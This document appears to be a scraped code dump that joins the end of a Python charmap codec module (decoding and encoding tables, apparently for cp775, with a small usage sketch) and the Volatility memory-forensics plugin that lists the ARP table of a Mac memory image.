u'[' # 0x005b -> LEFT SQUARE BRACKET
u'\\' # 0x005c -> REVERSE SOLIDUS
u']' # 0x005d -> RIGHT SQUARE BRACKET
u'^' # 0x005e -> CIRCUMFLEX ACCENT
u'_' # 0x005f -> LOW LINE
u'`' # 0x0060 -> GRAVE ACCENT
u'a' # 0x0061 -> LATIN SMALL LETTER A
u'b' # 0x0062 -> LATIN SMALL LETTER B
u'c' # 0x0063 -> LATIN SMALL LETTER C
u'd' # 0x0064 -> LATIN SMALL LETTER D
u'e' # 0x0065 -> LATIN SMALL LETTER E
u'f' # 0x0066 -> LATIN SMALL LETTER F
u'g' # 0x0067 -> LATIN SMALL LETTER G
u'h' # 0x0068 -> LATIN SMALL LETTER H
u'i' # 0x0069 -> LATIN SMALL LETTER I
u'j' # 0x006a -> LATIN SMALL LETTER J
u'k' # 0x006b -> LATIN SMALL LETTER K
u'l' # 0x006c -> LATIN SMALL LETTER L
u'm' # 0x006d -> LATIN SMALL LETTER M
u'n' # 0x006e -> LATIN SMALL LETTER N
u'o' # 0x006f -> LATIN SMALL LETTER O
u'p' # 0x0070 -> LATIN SMALL LETTER P
u'q' # 0x0071 -> LATIN SMALL LETTER Q
u'r' # 0x0072 -> LATIN SMALL LETTER R
u's' # 0x0073 -> LATIN SMALL LETTER S
u't' # 0x0074 -> LATIN SMALL LETTER T
u'u' # 0x0075 -> LATIN SMALL LETTER U
u'v' # 0x0076 -> LATIN SMALL LETTER V
u'w' # 0x0077 -> LATIN SMALL LETTER W
u'x' # 0x0078 -> LATIN SMALL LETTER X
u'y' # 0x0079 -> LATIN SMALL LETTER Y
u'z' # 0x007a -> LATIN SMALL LETTER Z
u'{' # 0x007b -> LEFT CURLY BRACKET
u'|' # 0x007c -> VERTICAL LINE
u'}' # 0x007d -> RIGHT CURLY BRACKET
u'~' # 0x007e -> TILDE
u'\x7f' # 0x007f -> DELETE
u'\u0106' # 0x0080 -> LATIN CAPITAL LETTER C WITH ACUTE
u'\xfc' # 0x0081 -> LATIN SMALL LETTER U WITH DIAERESIS
u'\xe9' # 0x0082 -> LATIN SMALL LETTER E WITH ACUTE
u'\u0101' # 0x0083 -> LATIN SMALL LETTER A WITH MACRON
u'\xe4' # 0x0084 -> LATIN SMALL LETTER A WITH DIAERESIS
u'\u0123' # 0x0085 -> LATIN SMALL LETTER G WITH CEDILLA
u'\xe5' # 0x0086 -> LATIN SMALL LETTER A WITH RING ABOVE
u'\u0107' # 0x0087 -> LATIN SMALL LETTER C WITH ACUTE
u'\u0142' # 0x0088 -> LATIN SMALL LETTER L WITH STROKE
u'\u0113' # 0x0089 -> LATIN SMALL LETTER E WITH MACRON
u'\u0156' # 0x008a -> LATIN CAPITAL LETTER R WITH CEDILLA
u'\u0157' # 0x008b -> LATIN SMALL LETTER R WITH CEDILLA
u'\u012b' # 0x008c -> LATIN SMALL LETTER I WITH MACRON
u'\u0179' # 0x008d -> LATIN CAPITAL LETTER Z WITH ACUTE
u'\xc4' # 0x008e -> LATIN CAPITAL LETTER A WITH DIAERESIS
u'\xc5' # 0x008f -> LATIN CAPITAL LETTER A WITH RING ABOVE
u'\xc9' # 0x0090 -> LATIN CAPITAL LETTER E WITH ACUTE
u'\xe6' # 0x0091 -> LATIN SMALL LIGATURE AE
u'\xc6' # 0x0092 -> LATIN CAPITAL LIGATURE AE
u'\u014d' # 0x0093 -> LATIN SMALL LETTER O WITH MACRON
u'\xf6' # 0x0094 -> LATIN SMALL LETTER O WITH DIAERESIS
u'\u0122' # 0x0095 -> LATIN CAPITAL LETTER G WITH CEDILLA
u'\xa2' # 0x0096 -> CENT SIGN
u'\u015a' # 0x0097 -> LATIN CAPITAL LETTER S WITH ACUTE
u'\u015b' # 0x0098 -> LATIN SMALL LETTER S WITH ACUTE
u'\xd6' # 0x0099 -> LATIN CAPITAL LETTER O WITH DIAERESIS
u'\xdc' # 0x009a -> LATIN CAPITAL LETTER U WITH DIAERESIS
u'\xf8' # 0x009b -> LATIN SMALL LETTER O WITH STROKE
u'\xa3' # 0x009c -> POUND SIGN
u'\xd8' # 0x009d -> LATIN CAPITAL LETTER O WITH STROKE
u'\xd7' # 0x009e -> MULTIPLICATION SIGN
u'\xa4' # 0x009f -> CURRENCY SIGN
u'\u0100' # 0x00a0 -> LATIN CAPITAL LETTER A WITH MACRON
u'\u012a' # 0x00a1 -> LATIN CAPITAL LETTER I WITH MACRON
u'\xf3' # 0x00a2 -> LATIN SMALL LETTER O WITH ACUTE
u'\u017b' # 0x00a3 -> LATIN CAPITAL LETTER Z WITH DOT ABOVE
u'\u017c' # 0x00a4 -> LATIN SMALL LETTER Z WITH DOT ABOVE
u'\u017a' # 0x00a5 -> LATIN SMALL LETTER Z WITH ACUTE
u'\u201d' # 0x00a6 -> RIGHT DOUBLE QUOTATION MARK
u'\xa6' # 0x00a7 -> BROKEN BAR
u'\xa9' # 0x00a8 -> COPYRIGHT SIGN
u'\xae' # 0x00a9 -> REGISTERED SIGN
u'\xac' # 0x00aa -> NOT SIGN
u'\xbd' # 0x00ab -> VULGAR FRACTION ONE HALF
u'\xbc' # 0x00ac -> VULGAR FRACTION ONE QUARTER
u'\u0141' # 0x00ad -> LATIN CAPITAL LETTER L WITH STROKE
u'\xab' # 0x00ae -> LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\xbb' # 0x00af -> RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\u2591' # 0x00b0 -> LIGHT SHADE
u'\u2592' # 0x00b1 -> MEDIUM SHADE
u'\u2593' # 0x00b2 -> DARK SHADE
u'\u2502' # 0x00b3 -> BOX DRAWINGS LIGHT VERTICAL
u'\u2524' # 0x00b4 -> BOX DRAWINGS LIGHT VERTICAL AND LEFT
u'\u0104' # 0x00b5 -> LATIN CAPITAL LETTER A WITH OGONEK
u'\u010c' # 0x00b6 -> LATIN CAPITAL LETTER C WITH CARON
u'\u0118' # 0x00b7 -> LATIN CAPITAL LETTER E WITH OGONEK
u'\u0116' # 0x00b8 -> LATIN CAPITAL LETTER E WITH DOT ABOVE
u'\u2563' # 0x00b9 -> BOX DRAWINGS DOUBLE VERTICAL AND LEFT
u'\u2551' # 0x00ba -> BOX DRAWINGS DOUBLE VERTICAL
u'\u2557' # 0x00bb -> BOX DRAWINGS DOUBLE DOWN AND LEFT
u'\u255d' # 0x00bc -> BOX DRAWINGS DOUBLE UP AND LEFT
u'\u012e' # 0x00bd -> LATIN CAPITAL LETTER I WITH OGONEK
u'\u0160' # 0x00be -> LATIN CAPITAL LETTER S WITH CARON
u'\u2510' # 0x00bf -> BOX DRAWINGS LIGHT DOWN AND LEFT
u'\u2514' # 0x00c0 -> BOX DRAWINGS LIGHT UP AND RIGHT
u'\u2534' # 0x00c1 -> BOX DRAWINGS LIGHT UP AND HORIZONTAL
u'\u252c' # 0x00c2 -> BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
u'\u251c' # 0x00c3 -> BOX DRAWINGS LIGHT VERTICAL AND RIGHT
u'\u2500' # 0x00c4 -> BOX DRAWINGS LIGHT HORIZONTAL
u'\u253c' # 0x00c5 -> BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
u'\u0172' # 0x00c6 -> LATIN CAPITAL LETTER U WITH OGONEK
u'\u016a' # 0x00c7 -> LATIN CAPITAL LETTER U WITH MACRON
u'\u255a' # 0x00c8 -> BOX DRAWINGS DOUBLE UP AND RIGHT
u'\u2554' # 0x00c9 -> BOX DRAWINGS DOUBLE DOWN AND RIGHT
u'\u2569' # 0x00ca -> BOX DRAWINGS DOUBLE UP AND HORIZONTAL
u'\u2566' # 0x00cb -> BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
u'\u2560' # 0x00cc -> BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
u'\u2550' # 0x00cd -> BOX DRAWINGS DOUBLE HORIZONTAL
u'\u256c' # 0x00ce -> BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
u'\u017d' # 0x00cf -> LATIN CAPITAL LETTER Z WITH CARON
u'\u0105' # 0x00d0 -> LATIN SMALL LETTER A WITH OGONEK
u'\u010d' # 0x00d1 -> LATIN SMALL LETTER C WITH CARON
u'\u0119' # 0x00d2 -> LATIN SMALL LETTER E WITH OGONEK
u'\u0117' # 0x00d3 -> LATIN SMALL LETTER E WITH DOT ABOVE
u'\u012f' # 0x00d4 -> LATIN SMALL LETTER I WITH OGONEK
u'\u0161' # 0x00d5 -> LATIN SMALL LETTER S WITH CARON
u'\u0173' # 0x00d6 -> LATIN SMALL LETTER U WITH OGONEK
u'\u016b' # 0x00d7 -> LATIN SMALL LETTER U WITH MACRON
u'\u017e' # 0x00d8 -> LATIN SMALL LETTER Z WITH CARON
u'\u2518' # 0x00d9 -> BOX DRAWINGS LIGHT UP AND LEFT
u'\u250c' # 0x00da -> BOX DRAWINGS LIGHT DOWN AND RIGHT
u'\u2588' # 0x00db -> FULL BLOCK
u'\u2584' # 0x00dc -> LOWER HALF BLOCK
u'\u258c' # 0x00dd -> LEFT HALF BLOCK
u'\u2590' # 0x00de -> RIGHT HALF BLOCK
u'\u2580' # 0x00df -> UPPER HALF BLOCK
u'\xd3' # 0x00e0 -> LATIN CAPITAL LETTER O WITH ACUTE
u'\xdf' # 0x00e1 -> LATIN SMALL LETTER SHARP S (GERMAN)
u'\u014c' # 0x00e2 -> LATIN CAPITAL LETTER O WITH MACRON
u'\u0143' # 0x00e3 -> LATIN CAPITAL LETTER N WITH ACUTE
u'\xf5' # 0x00e4 -> LATIN SMALL LETTER O WITH TILDE
u'\xd5' # 0x00e5 -> LATIN CAPITAL LETTER O WITH TILDE
u'\xb5' # 0x00e6 -> MICRO SIGN
u'\u0144' # 0x00e7 -> LATIN SMALL LETTER N WITH ACUTE
u'\u0136' # 0x00e8 -> LATIN CAPITAL LETTER K WITH CEDILLA
u'\u0137' # 0x00e9 -> LATIN SMALL LETTER K WITH CEDILLA
u'\u013b' # 0x00ea -> LATIN CAPITAL LETTER L WITH CEDILLA
u'\u013c' # 0x00eb -> LATIN SMALL LETTER L WITH CEDILLA
u'\u0146' # 0x00ec -> LATIN SMALL LETTER N WITH CEDILLA
u'\u0112' # 0x00ed -> LATIN CAPITAL LETTER E WITH MACRON
u'\u0145' # 0x00ee -> LATIN CAPITAL LETTER N WITH CEDILLA
u'\u2019' # 0x00ef -> RIGHT SINGLE QUOTATION MARK
u'\xad' # 0x00f0 -> SOFT HYPHEN
u'\xb1' # 0x00f1 -> PLUS-MINUS SIGN
u'\u201c' # 0x00f2 -> LEFT DOUBLE QUOTATION MARK
u'\xbe' # 0x00f3 -> VULGAR FRACTION THREE QUARTERS
u'\xb6' # 0x00f4 -> PILCROW SIGN
u'\xa7' # 0x00f5 -> SECTION SIGN
u'\xf7' # 0x00f6 -> DIVISION SIGN
u'\u201e' # 0x00f7 -> DOUBLE LOW-9 QUOTATION MARK
u'\xb0' # 0x00f8 -> DEGREE SIGN
u'\u2219' # 0x00f9 -> BULLET OPERATOR
u'\xb7' # 0x00fa -> MIDDLE DOT
u'\xb9' # 0x00fb -> SUPERSCRIPT ONE
u'\xb3' # 0x00fc -> SUPERSCRIPT THREE
u'\xb2' # 0x00fd -> SUPERSCRIPT TWO
u'\u25a0' # 0x00fe -> BLACK SQUARE
u'\xa0' # 0x00ff -> NO-BREAK SPACE
)

### Encoding Map

encoding_map = {
0x0000: 0x0000, # NULL
0x0001: 0x0001, # START OF HEADING
0x0002: 0x0002, # START OF TEXT
0x0003: 0x0003, # END OF TEXT
0x0004: 0x0004, # END OF TRANSMISSION
0x0005: 0x0005, # ENQUIRY
0x0006: 0x0006, # ACKNOWLEDGE
0x0007: 0x0007, # BELL
0x0008: 0x0008, # BACKSPACE
0x0009: 0x0009, # HORIZONTAL TABULATION
0x000a: 0x000a, # LINE FEED
0x000b: 0x000b, # VERTICAL TABULATION
0x000c: 0x000c, # FORM FEED
0x000d: 0x000d, # CARRIAGE RETURN
0x000e: 0x000e, # SHIFT OUT
0x000f: 0x000f, # SHIFT IN
0x0010: 0x0010, # DATA LINK ESCAPE
0x0011: 0x0011, # DEVICE CONTROL ONE
0x0012: 0x0012, # DEVICE CONTROL TWO
0x0013: 0x0013, # DEVICE CONTROL THREE
0x0014: 0x0014, # DEVICE CONTROL FOUR
0x0015: 0x0015, # NEGATIVE ACKNOWLEDGE
0x0016: 0x0016, # SYNCHRONOUS IDLE
0x0017: 0x0017, # END OF TRANSMISSION BLOCK
0x0018: 0x0018, # CANCEL
0x0019: 0x0019, # END OF MEDIUM
0x001a: 0x001a, # SUBSTITUTE
0x001b: 0x001b, # ESCAPE
0x001c: 0x001c, # FILE SEPARATOR
0x001d: 0x001d, # GROUP SEPARATOR
0x001e: 0x001e, # RECORD SEPARATOR
0x001f: 0x001f, # UNIT SEPARATOR
0x0020: 0x0020, # SPACE
0x0021: 0x0021, # EXCLAMATION MARK
0x0022: 0x0022, # QUOTATION MARK
0x0023: 0x0023, # NUMBER SIGN
0x0024: 0x0024, # DOLLAR SIGN
0x0025: 0x0025, # PERCENT SIGN
0x0026: 0x0026, # AMPERSAND
0x0027: 0x0027, # APOSTROPHE
0x0028: 0x0028, # LEFT PARENTHESIS
0x0029: 0x0029, # RIGHT PARENTHESIS
0x002a: 0x002a, # ASTERISK
0x002b: 0x002b, # PLUS SIGN
0x002c: 0x002c, # COMMA
0x002d: 0x002d, # HYPHEN-MINUS
0x002e: 0x002e, # FULL STOP
0x002f: 0x002f, # SOLIDUS
0x0030: 0x0030, # DIGIT ZERO
0x0031: 0x0031, # DIGIT ONE
0x0032: 0x0032, # DIGIT TWO
0x0033: 0x0033, # DIGIT THREE
0x0034: 0x0034, # DIGIT FOUR
0x0035: 0x0035, # DIGIT FIVE
0x0036: 0x0036, # DIGIT SIX
0x0037: 0x0037, # DIGIT SEVEN
0x0038: 0x0038, # DIGIT EIGHT
0x0039: 0x0039, # DIGIT NINE
0x003a: 0x003a, # COLON
0x003b: 0x003b, # SEMICOLON
0x003c: 0x003c, # LESS-THAN SIGN
0x003d: 0x003d, # EQUALS SIGN
0x003e: 0x003e, # GREATER-THAN SIGN
0x003f: 0x003f, # QUESTION MARK
0x0040: 0x0040, # COMMERCIAL AT
0x0041: 0x0041, # LATIN CAPITAL LETTER A
0x0042: 0x0042, # LATIN CAPITAL LETTER B
0x0043: 0x0043, # LATIN CAPITAL LETTER C
0x0044: 0x0044, # LATIN CAPITAL LETTER D
0x0045: 0x0045, # LATIN CAPITAL LETTER E
0x0046: 0x0046, # LATIN CAPITAL LETTER F
0x0047: 0x0047, # LATIN CAPITAL LETTER G
0x0048: 0x0048, # LATIN CAPITAL LETTER H
0x0049: 0x0049, # LATIN CAPITAL LETTER I
0x004a: 0x004a, # LATIN CAPITAL LETTER J
0x004b: 0x004b, # LATIN CAPITAL LETTER K
0x004c: 0x004c, # LATIN CAPITAL LETTER L
0x004d: 0x004d, # LATIN CAPITAL LETTER M
0x004e: 0x004e, # LATIN CAPITAL LETTER N
0x004f: 0x004f, # LATIN CAPITAL LETTER O
0x0050: 0x0050, # LATIN CAPITAL LETTER P
0x0051: 0x0051, # LATIN CAPITAL LETTER Q
0x0052: 0x0052, # LATIN CAPITAL LETTER R
0x0053: 0x0053, # LATIN CAPITAL LETTER S
0x0054: 0x0054, # LATIN CAPITAL LETTER T
0x0055: 0x0055, # LATIN CAPITAL LETTER U
0x0056: 0x0056, # LATIN CAPITAL LETTER V
0x0057: 0x0057, # LATIN CAPITAL LETTER W
0x0058: 0x0058, # LATIN CAPITAL LETTER X
0x0059: 0x0059, # LATIN CAPITAL LETTER Y
0x005a: 0x005a, # LATIN CAPITAL LETTER Z
0x005b: 0x005b, # LEFT SQUARE BRACKET
0x005c: 0x005c, # REVERSE SOLIDUS
0x005d: 0x005d, # RIGHT SQUARE BRACKET
0x005e: 0x005e, # CIRCUMFLEX ACCENT
0x005f: 0x005f, # LOW LINE
0x0060: 0x0060, # GRAVE ACCENT
0x0061: 0x0061, # LATIN SMALL LETTER A
0x0062: 0x0062, # LATIN SMALL LETTER B
0x0063: 0x0063, # LATIN SMALL LETTER C
0x0064: 0x0064, # LATIN SMALL LETTER D
0x0065: 0x0065, # LATIN SMALL LETTER E
0x0066: 0x0066, # LATIN SMALL LETTER F
0x0067: 0x0067, # LATIN SMALL LETTER G
0x0068: 0x0068, # LATIN SMALL LETTER H
0x0069: 0x0069, # LATIN SMALL LETTER I
0x006a: 0x006a, # LATIN SMALL LETTER J
0x006b: 0x006b, # LATIN SMALL LETTER K
0x006c: 0x006c, # LATIN SMALL LETTER L
0x006d: 0x006d, # LATIN SMALL LETTER M
0x006e: 0x006e, # LATIN SMALL LETTER N
0x006f: 0x006f, # LATIN SMALL LETTER O
0x0070: 0x0070, # LATIN SMALL LETTER P
0x0071: 0x0071, # LATIN SMALL LETTER Q
0x0072: 0x0072, # LATIN SMALL LETTER R
0x0073: 0x0073, # LATIN SMALL LETTER S
0x0074: 0x0074, # LATIN SMALL LETTER T
0x0075: 0x0075, # LATIN SMALL LETTER U
0x0076: 0x0076, # LATIN SMALL LETTER V
0x0077: 0x0077, # LATIN SMALL LETTER W
0x0078: 0x0078, # LATIN SMALL LETTER X
0x0079: 0x0079, # LATIN SMALL LETTER Y
0x007a: 0x007a, # LATIN SMALL LETTER Z
0x007b: 0x007b, # LEFT CURLY BRACKET
0x007c: 0x007c, # VERTICAL LINE
0x007d: 0x007d, # RIGHT CURLY BRACKET
0x007e: 0x007e, # TILDE
0x007f: 0x007f, # DELETE
0x00a0: 0x00ff, # NO-BREAK SPACE
0x00a2: 0x0096, # CENT SIGN
0x00a3: 0x009c, # POUND SIGN
0x00a4: 0x009f, # CURRENCY SIGN
0x00a6: 0x00a7, # BROKEN BAR
0x00a7: 0x00f5, # SECTION SIGN
0x00a9: 0x00a8, # COPYRIGHT SIGN
0x00ab: 0x00ae, # LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00ac: 0x00aa, # NOT SIGN
0x00ad: 0x00f0, # SOFT HYPHEN
0x00ae: 0x00a9, # REGISTERED SIGN
0x00b0: 0x00f8, # DEGREE SIGN
0x00b1: 0x00f1, # PLUS-MINUS SIGN
0x00b2: 0x00fd, # SUPERSCRIPT TWO
0x00b3: 0x00fc, # SUPERSCRIPT THREE
0x00b5: 0x00e6, # MICRO SIGN
0x00b6: 0x00f4, # PILCROW SIGN
0x00b7: 0x00fa, # MIDDLE DOT
0x00b9: 0x00fb, # SUPERSCRIPT ONE
0x00bb: 0x00af, # RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00bc: 0x00ac, # VULGAR FRACTION ONE QUARTER
0x00bd: 0x00ab, # VULGAR FRACTION ONE HALF
0x00be: 0x00f3, # VULGAR FRACTION THREE QUARTERS
0x00c4: 0x008e, # LATIN CAPITAL LETTER A WITH DIAERESIS
0x00c5: 0x008f, # LATIN CAPITAL LETTER A WITH RING ABOVE
0x00c6: 0x0092, # LATIN CAPITAL LIGATURE AE
0x00c9: 0x0090, # LATIN CAPITAL LETTER E WITH ACUTE
0x00d3: 0x00e0, # LATIN CAPITAL LETTER O WITH ACUTE
0x00d5: 0x00e5, # LATIN CAPITAL LETTER O WITH TILDE
0x00d6: 0x0099, # LATIN CAPITAL LETTER O WITH DIAERESIS
0x00d7: 0x009e, # MULTIPLICATION SIGN
0x00d8: 0x009d, # LATIN CAPITAL LETTER O WITH STROKE
0x00dc: 0x009a, # LATIN CAPITAL LETTER U WITH DIAERESIS
0x00df: 0x00e1, # LATIN SMALL LETTER SHARP S (GERMAN)
0x00e4: 0x0084, # LATIN SMALL LETTER A WITH DIAERESIS
0x00e5: 0x0086, # LATIN SMALL LETTER A WITH RING ABOVE
0x00e6: 0x0091, # LATIN SMALL LIGATURE AE
0x00e9: 0x0082, # LATIN SMALL LETTER E WITH ACUTE
0x00f3: 0x00a2, # LATIN SMALL LETTER O WITH ACUTE
0x00f5: 0x00e4, # LATIN SMALL LETTER O WITH TILDE
0x00f6: 0x0094, # LATIN SMALL LETTER O WITH DIAERESIS
0x00f7: 0x00f6, # DIVISION SIGN
0x00f8: 0x009b, # LATIN SMALL LETTER O WITH STROKE
0x00fc: 0x0081, # LATIN SMALL LETTER U WITH DIAERESIS
0x0100: 0x00a0, # LATIN CAPITAL LETTER A WITH MACRON
0x0101: 0x0083, # LATIN SMALL LETTER A WITH MACRON
0x0104: 0x00b5, # LATIN CAPITAL LETTER A WITH OGONEK
0x0105: 0x00d0, # LATIN SMALL LETTER A WITH OGONEK
0x0106: 0x0080, # LATIN CAPITAL LETTER C WITH ACUTE
0x0107: 0x0087, # LATIN SMALL LETTER C WITH ACUTE
0x010c: 0x00b6, # LATIN CAPITAL LETTER C WITH CARON
0x010d: 0x00d1, # LATIN SMALL LETTER C WITH CARON
0x0112: 0x00ed, # LATIN CAPITAL LETTER E WITH MACRON
0x0113: 0x0089, # LATIN SMALL LETTER E WITH MACRON
0x0116: 0x00b8, # LATIN CAPITAL LETTER E WITH DOT ABOVE
0x0117: 0x00d3, # LATIN SMALL LETTER E WITH DOT ABOVE
0x0118: 0x00b7, # LATIN CAPITAL LETTER E WITH OGONEK
0x0119: 0x00d2, # LATIN SMALL LETTER E WITH OGONEK
0x0122: 0x0095, # LATIN CAPITAL LETTER G WITH CEDILLA
0x0123: 0x0085, # LATIN SMALL LETTER G WITH CEDILLA
0x012a: 0x00a1, # LATIN CAPITAL LETTER I WITH MACRON
0x012b: 0x008c, # LATIN SMALL LETTER I WITH MACRON
0x012e: 0x00bd, # LATIN CAPITAL LETTER I WITH OGONEK
0x012f: 0x00d4, # LATIN SMALL LETTER I WITH OGONEK
0x0136: 0x00e8, # LATIN CAPITAL LETTER K WITH CEDILLA
0x0137: 0x00e9, # LATIN SMALL LETTER K WITH CEDILLA
0x013b: 0x00ea, # LATIN CAPITAL LETTER L WITH CEDILLA
0x013c: 0x00eb, # LATIN SMALL LETTER L WITH CEDILLA
0x0141: 0x00ad, # LATIN CAPITAL LETTER L WITH STROKE
0x0142: 0x0088, # LATIN SMALL LETTER L WITH STROKE
0x0143: 0x00e3, # LATIN CAPITAL LETTER N WITH ACUTE
0x0144: 0x00e7, # LATIN SMALL LETTER N WITH ACUTE
0x0145: 0x00ee, # LATIN CAPITAL LETTER N WITH CEDILLA
0x0146: 0x00ec, # LATIN SMALL LETTER N WITH CEDILLA
0x014c: 0x00e2, # LATIN CAPITAL LETTER O WITH MACRON
0x014d: 0x0093, # LATIN SMALL LETTER O WITH MACRON
0x0156: 0x008a, # LATIN CAPITAL LETTER R WITH CEDILLA
0x0157: 0x008b, # LATIN SMALL LETTER R WITH CEDILLA
0x015a: 0x0097, # LATIN CAPITAL LETTER S WITH ACUTE
0x015b: 0x0098, # LATIN SMALL LETTER S WITH ACUTE
0x0160: 0x00be, # LATIN CAPITAL LETTER S WITH CARON
0x0161: 0x00d5, # LATIN SMALL LETTER S WITH CARON
0x016a: 0x00c7, # LATIN CAPITAL LETTER U WITH MACRON
0x016b: 0x00d7, # LATIN SMALL LETTER U WITH MACRON
0x0172: 0x00c6, # LATIN CAPITAL LETTER U WITH OGONEK
0x0173: 0x00d6, # LATIN SMALL LETTER U WITH OGONEK
0x0179: 0x008d, # LATIN CAPITAL LETTER Z WITH ACUTE
0x017a: 0x00a5, # LATIN SMALL LETTER Z WITH ACUTE
0x017b: 0x00a3, # LATIN CAPITAL LETTER Z WITH DOT ABOVE
0x017c: 0x00a4, # LATIN SMALL LETTER Z WITH DOT ABOVE
0x017d: 0x00cf, # LATIN CAPITAL LETTER Z WITH CARON
0x017e: 0x00d8, # LATIN SMALL LETTER Z WITH CARON
0x2019: 0x00ef, # RIGHT SINGLE QUOTATION MARK
0x201c: 0x00f2, # LEFT DOUBLE QUOTATION MARK
0x201d: 0x00a6, # RIGHT DOUBLE QUOTATION MARK
0x201e: 0x00f7, # DOUBLE LOW-9 QUOTATION MARK
0x2219: 0x00f9, # BULLET OPERATOR
0x2500: 0x00c4, # BOX DRAWINGS LIGHT HORIZONTAL
0x2502: 0x00b3, # BOX DRAWINGS LIGHT VERTICAL
0x250c: 0x00da, # BOX DRAWINGS LIGHT DOWN AND RIGHT
0x2510: 0x00bf, # BOX DRAWINGS LIGHT DOWN AND LEFT
0x2514: 0x00c0, # BOX DRAWINGS LIGHT UP AND RIGHT
0x2518: 0x00d9, # BOX DRAWINGS LIGHT UP AND LEFT
0x251c: 0x00c3, # BOX DRAWINGS LIGHT VERTICAL AND RIGHT
0x2524: 0x00b4, # BOX DRAWINGS LIGHT VERTICAL AND LEFT
0x252c: 0x00c2, # BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
0x2534: 0x00c1, # BOX DRAWINGS LIGHT UP AND HORIZONTAL
0x253c: 0x00c5, # BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
0x2550: 0x00cd, # BOX DRAWINGS DOUBLE HORIZONTAL
0x2551: 0x00ba, # BOX DRAWINGS DOUBLE VERTICAL
0x2554: 0x00c9, # BOX DRAWINGS DOUBLE DOWN AND RIGHT
0x2557: 0x00bb, # BOX DRAWINGS DOUBLE DOWN AND LEFT
0x255a: 0x00c8, # BOX DRAWINGS DOUBLE UP AND RIGHT
0x255d: 0x00bc, # BOX DRAWINGS DOUBLE UP AND LEFT
0x2560: 0x00cc, # BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
0x2563: 0x00b9, # BOX DRAWINGS DOUBLE VERTICAL AND LEFT
0x2566: 0x00cb, # BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
0x2569: 0x00ca, # BOX DRAWINGS DOUBLE UP AND HORIZONTAL
0x256c: 0x00ce, # BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
0x2580: 0x00df, # UPPER HALF BLOCK
0x2584: 0x00dc, # LOWER HALF BLOCK
0x2588: 0x00db, # FULL BLOCK
0x258c: 0x00dd, # LEFT HALF BLOCK
0x2590: 0x00de, # RIGHT HALF BLOCK
0x2591: 0x00b0, # LIGHT SHADE
0x2592: 0x00b1, # MEDIUM SHADE
0x2593: 0x00b2, # DARK SHADE
0x25a0: 0x00fe, # BLACK SQUARE
}
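
### Usage sketch (added for illustration; not part of the original module).
### Standard library charmap codecs wire tables like the ones above into
### the codecs machinery roughly as below; the class and the registry name
### are assumptions here, since this dump preserves only the tables.
import codecs

class Codec(codecs.Codec):

    def encode(self, input, errors='strict'):
        # charmap_encode maps each Unicode character through encoding_map
        # back to its one-byte code point.
        return codecs.charmap_encode(input, errors, encoding_map)

    def decode(self, input, errors='strict'):
        # charmap_decode indexes each byte into decoding_table to recover
        # the corresponding Unicode character.
        return codecs.charmap_decode(input, errors, decoding_table)

def getregentry():
    # 'cp775-sketch' is a placeholder; a real encodings module registers
    # its canonical codec name (e.g. 'cp775') here.
    return codecs.CodecInfo(
        name='cp775-sketch',
        encode=Codec().encode,
        decode=Codec().decode,
    )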
| gpl-3.0 | 3,162,141,460,249,367,600 | 48.830703 | 103 | 0.593469 | false |
StephaneP/volatility | volatility/plugins/mac/arp.py | 58 | 1398 | # Volatility
# Copyright (C) 2007-2013 Volatility Foundation
#
# This file is part of Volatility.
#
# Volatility is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Volatility is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Volatility. If not, see <http://www.gnu.org/licenses/>.
#
"""
@author: Andrew Case
@license: GNU General Public License 2.0
@contact: atcuno@gmail.com
@organization:
"""
import volatility.obj as obj
import volatility.plugins.mac.common as common
import volatility.plugins.mac.route as route


class mac_arp(route.mac_route):
    """ Prints the arp table """

    def calculate(self):
        common.set_plugin_members(self)

        # _llinfo_arp is the kernel symbol heading the linked list of ARP
        # records; dereference it to reach the first llinfo_arp structure.
        arp_addr = self.addr_space.profile.get_symbol("_llinfo_arp")
        ptr = obj.Object("Pointer", offset = arp_addr, vm = self.addr_space)
        ent = ptr.dereference_as("llinfo_arp")

        # Walk the list, yielding each record's route entry (la_rt) until
        # the forward link is NULL.
        while ent:
            yield ent.la_rt
            ent = ent.la_le.le_next
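
# Illustrative, standalone sketch (not Volatility code) of the traversal
# pattern calculate() relies on: the kernel keeps ARP records in a singly
# linked list headed at _llinfo_arp; each node carries a route entry
# (la_rt) and an embedded list entry (la_le) whose le_next field points at
# the successor. The classes below are plain stand-ins for the kernel
# structures, not real Volatility objects.
class _ListEntry(object):
    def __init__(self, le_next=None):
        self.le_next = le_next

class _LlinfoArp(object):
    def __init__(self, la_rt, le_next=None):
        self.la_rt = la_rt                  # payload: the owning route entry
        self.la_le = _ListEntry(le_next)    # forward link in the kernel list

def _walk(head):
    """Yield each la_rt, exactly as calculate() does, until a NULL link."""
    ent = head
    while ent:
        yield ent.la_rt
        ent = ent.la_le.le_next

if __name__ == '__main__':
    # A three-element list yields its payloads in order.
    _head = _LlinfoArp("rt0", _LlinfoArp("rt1", _LlinfoArp("rt2")))
    assert list(_walk(_head)) == ["rt0", "rt1", "rt2"]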
| gpl-2.0 | 5,507,235,411,612,354,000 | 31.511628 | 76 | 0.700286 | false |